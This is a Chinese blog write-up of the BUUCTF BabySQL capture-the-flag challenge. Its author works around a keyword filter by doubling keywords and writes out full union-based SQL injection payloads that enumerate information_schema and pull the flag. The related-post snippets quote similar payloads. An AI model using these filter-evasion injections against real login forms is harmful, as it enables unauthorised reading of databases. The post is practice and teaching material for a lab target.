buuctf 极客大挑战 babysql

最新推荐文章于 2024-06-24 16:15:27 发布
最新推荐文章于 2024-06-24 16:15:27 发布
阅读量1.6k 收藏 4
点赞数
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SopRomeo/article/details/104024986
版权

常规注入不可行,很明显过滤了什么字符,我试了下双写。
跟之前lovesql差不多
在这里插入图片描述
这边报错,试试双写and
在这里插入图片描述
这边发现显示and了
查询表的时候发现报错了在这里插入图片描述
看到报错的内容,缺哪个就双写哪个 oorrder bbyy
然后就是常规操作了,发现也3个字段在这里插入图片描述
接着联合查询双写
在这里插入图片描述
好了跟lovesql差不多了,flag应该也是在3个字段
常规操作
我自己瞎试了试from的双写frfromom
发现在这里插入图片描述
好了跟order 双写一样在这里插入图片描述
爆出库名,很明显flag在ctf库里,然后就特别简单了
playload:http://a86210a7-e9a6-4761-bf62-ff61cafda938.node3.buuoj.cn/check.php?username=1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables %23&password=3543
在这里插入图片描述
这个很明显了,估计字段名也是flag,还是老实查吧
payloadusername=1' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns %23&password=3543
在这里插入图片描述
果然是flag
payload:

username=1' ununionion seselectlect 1,2,group_concat(flag) frfromom ctf.Flag %23&password=3543

在这里插入图片描述

penson by 小乌
关注
专栏目录
BUUCTF-Web】[极客挑战 2019]BabySQL
weixin_49298681的博客
01-05 273
1.根据提示知道sql注入有严格的过滤;再通过尝试找到绕过的方法为藏字符2.直接获得username和password 但是没有有用的信息3.通过order by的报错知晓有多少列:root =4.寻找回显点:root =>5.获得数据库基本信息:root =>6.通过information_schema数据库爆破table_name + column_names1.root =2.root =7.再根据知道的column_names去获取数据1.root =
[极客挑战 2019]BabySQL 1
qq_43618536的博客
07-02 379
BUUCTF的[极客挑战 2019]BabySQL 1
buuctf BabySQli
qq_44111753的博客
01-02 1045
随便输入,发现一串密文,数字+大写字母,大概是采用base32加密 base32解密如下,有“=”,猜测是base64加密 base64解密如下 查询后台数据库username等于输入值得所有数据 后台数据库的登录逻辑大概是:将输入的用户名与后台数据库中的所有用户名做比较,找出相等的,然后用这组数据的密码与用户输入的密码作比较,若相等,则登录成功 重要点:放置于后台的数据库大概率是经过hash加密的 操作:在用户名框注入 1’ union select ‘admin’,加密后的密码 为了使登录成功,注入
BUUCTF Web [极客挑战 2024]LoveSQL_buuctf lovesql
最新发布
06-24 978
进入题目连接是一个「登录」界面登录「成功」会显示当前用户的账号和密码登录「失败」则会则会提示错误的用户名和密码。
[极客挑战 2019]BabySQL
Knsec
05-18 641
[极客挑战 2019]BabySQL
buuctf web [极客挑战 2019]BabySQL
m0_46412682的博客
07-16 947
buuctf web [极客挑战 2019]BabySQL 开始的页面 随便输入用户名和密码 sql注入,先判断有多少字段 从图中可以看到select和union被过滤了,可以用双写selselectect uniunionon还有的是’单引号和#要编码变成%27 %23,先猜测4个字段,错误 3个字段,成功 ?username=admin&password=123%27ununionion selselectect 1,2,3%20%23 爆库 ?username=admin&
BUUCTF-WEB
ccfly1012的博客
11-02 3868
目录 [HCTF 2018]WarmUp [极客挑战 2019]EasySQL 总结万能密码 [极客挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
BUUCTF-WriteUp
鱼的博客
02-01 737
title: BUUCTF WriteUp date: 2021-01-16 17:44:59 tags: CTF WriteUP WEB [HCTF 2018]WarmUp 启动环境,打开网址是一张滑稽,没什么用,看一下源码,发现有注释。 访问source.php,直接给了源码,进行代码审计。 分两块,第一块是emmm::checkFile,里面做了一些判断。 第二块是一个include,文件包含,我们要绕过验证,也就是上面的checkFile方法。 hint.php include触发的三个判断.
极客挑战2019babysql
kindyyy的博客
04-08 1487
我也是参考了大佬的wp才会做的题目..... 大佬博客:[极客挑战 2019]BabySQL - 云千 - 博客园 (对我自己来说)要一步一步的从查库,查表,查列,查字段慢慢来,从这道题我们还要注意有些命令是会被注释的,可以用双写绕过。 大概就是这样。先看题目吧: ...
极客挑战2019】Baby SQL解题
Bird&Bird
10-25 2071
1、打开BUUCTF在线评测,选择web--->【极客挑战2019】Baby SQL。 2、首先采用万能密码试一下,出错了。 3、那使用普通注入试一下,报错了,从这里可以看出过滤了 union select 。 4、接着使用双写方式绕过过滤,试一下。 username=admin&password=123456' ununionion selselectect 1 %23 从结果上看,虽然也报错了,但提示不是sql语法错误,而且我们提供的查询字段数不对。 ..
BUUCTFBabySQL[极客挑战 2019]
金 帛的博客
06-11 464
BUUCTF记录贴
BUUCTF - web - BabySQL
1tachi的博客
11-04 263
文章目录判断注入类型判断字段数判断回显点查表查字段查数据 判断注入类型 尝试万能密码:'1 or 1=1 -- qwe 发现仅剩下1=1 -- qwe,可能ban掉了"or"关键词 尝试双写:1' oorr 1=1 -- qwe 登陆成功,可能以后都要双写了 判断字段数 1' oorrder bbyy 3 -- qwe 看来有三个字段 判断回显点 1' ununionion seselectlect 1,2,3 -- qwe 回显点是2和3 查表 1' ununionion seselectlect
BUUCTF web BabySQL
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
12-18 75
进入靶场,老办法随便输入看一下。
BUUCTF WEB BabySql
qq_41696858的博客
09-03 309
题其实没什么,就是一个双写绕过waf的问题 按照常理,admin’ 123监测是否单引号闭合,直接给出注入点,且有回显 经过测试,waf过滤了or,by那么爆破列数的时候(直接输入order by 1会回显der 1): admin’ oorrder bbyy 1# 测试到4的时候会出现unknown_column,那么列数是3 -1’ ununionion selselectect 1,2,3# 下面爆破数据库,union select同样被过滤,同样双写 -1’ ununionion selselect
buuctf 极客挑战2019php
08-24
buuctf 极客挑战2019php是指buuctf举办的一个PHP编程比赛,它是基于阿里云IoT技术平台的创新挑战赛。在该比赛中,参赛者需要利用PHP编写代码解决一系列技术难题。这些问题可能涉及到序列化、反序列化、变量值的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值